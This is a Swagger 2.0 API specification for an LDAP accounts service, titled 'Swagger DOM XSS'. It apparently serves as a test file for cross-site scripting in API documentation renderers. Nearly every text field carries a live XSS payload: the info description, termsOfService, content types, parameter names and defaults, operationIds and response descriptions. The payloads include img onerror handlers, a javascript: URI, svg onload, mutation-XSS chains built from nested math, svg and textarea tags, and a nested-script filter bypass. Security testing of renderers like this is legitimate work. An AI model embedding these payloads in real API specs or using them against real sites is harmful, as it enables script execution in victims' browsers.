swagger: '2.0'
info: 
  title: Swagger DOM XSS
  description: <img src=x onerror="alert('XSS')"></input><input onfocus=console.log(69)><h2>XSS|
    <mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>

  termsOfService: "javascript:prompt()"
  version: production
basePath: /
produces:
  - application/xml
  - application/json
  - <img>XSS<p>
  - text/html
consumes:
  - application/xml
  - application/json
  - text/html
security:
  - basicAuth: []
paths:
  /accounts:
    get:
      responses:
        '200':
          type: string   
          description: <h1>prints xss</h1>|
            <img src=x></p><h2>testxss</h2><p></p></div><span><a href=x onclick=gg>CLICK ME</a></div></div></td></tr></tbody></table>

      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
  '/xss.html':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>

          format: int64
          in: path
          name: photoUrls"<script>alert(1)</script>
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: deleteGroupById
      summary: Deletes a group by id
    get:
      parameters:
        - description: |
          <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><style><a title="</style><img src='#' onerror='alert(1)'>">

          type: string
          in: \">%0a%0d%0a<svg/onload=alert()>
          default: \"><img src=x onfocus=prompt()>
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: /xss.html\"><img src=x onpointer=print()>
      summary: Finds groups by id
    post:
      parameters:
        - description: |
          <form><math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><style><a title="</style><img src='#' onerror='alert(1)'>"></form>

          in: path
          name: id
          required: true
          type: string
      responses:
        '200':
          description: No <h1>response was <scr<script>ipt>ipt<script>>specified
      tags:
        - accounts
      description: 'You cannot create an LDAP group with a POST.  '
      operationId: createGroupById
      summary: Creates a new group by id
    put:
      parameters:
        - description: Id value to filter by
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: <h1>Hello</h1><script>alert('XSS')</script>
      tags:
        - accounts
      description: You cannot change information for an LDAP group with a PUT.
      operationId: \xss.html
      summary: Updates an existing group by id
  '/accounts/groupname/{name}':
    get:
      parameters:
        - description: Name to filter by
          in: path
          name: name
          required: true
          type: string
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      description: 'You can PUT, POST, and DELETE using this resource URL.'
      operationId: findGroupsByName
      summary: Finds groups by name
  '/accounts/userid/{id}':
    delete:
      parameters:
        - description: Id value to filter by
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: deleteUserById
      summary: Deletes a user by id
    get:
      parameters:
        - description: Id value to filter by
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findUsersById
      summary: Finds users by id
    post:
      parameters:
        - description: Id value to filter by
          in: path
          name: id
          required: true
          type: string
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      description: 'You cannot create an LDAP account or assign a password with a POST.  '
      operationId: createUserById
      summary: Creates a new user by id
    put:
      parameters:
        - description: Id value to filter by
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      description: You cannot change information in an LDAP account or change a password with a PUT.
      operationId: updateUserById
      summary: Updates an existing user by id
  '/accounts/username/{name}':
    get:
      parameters:
        - description: Name to filter by
          in: path
          name: name
          required: true
          type: string
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      description: 'You can PUT, POST, and DELETE using this resource URL.'
      operationId: findUsersByName
      summary: Finds users by name
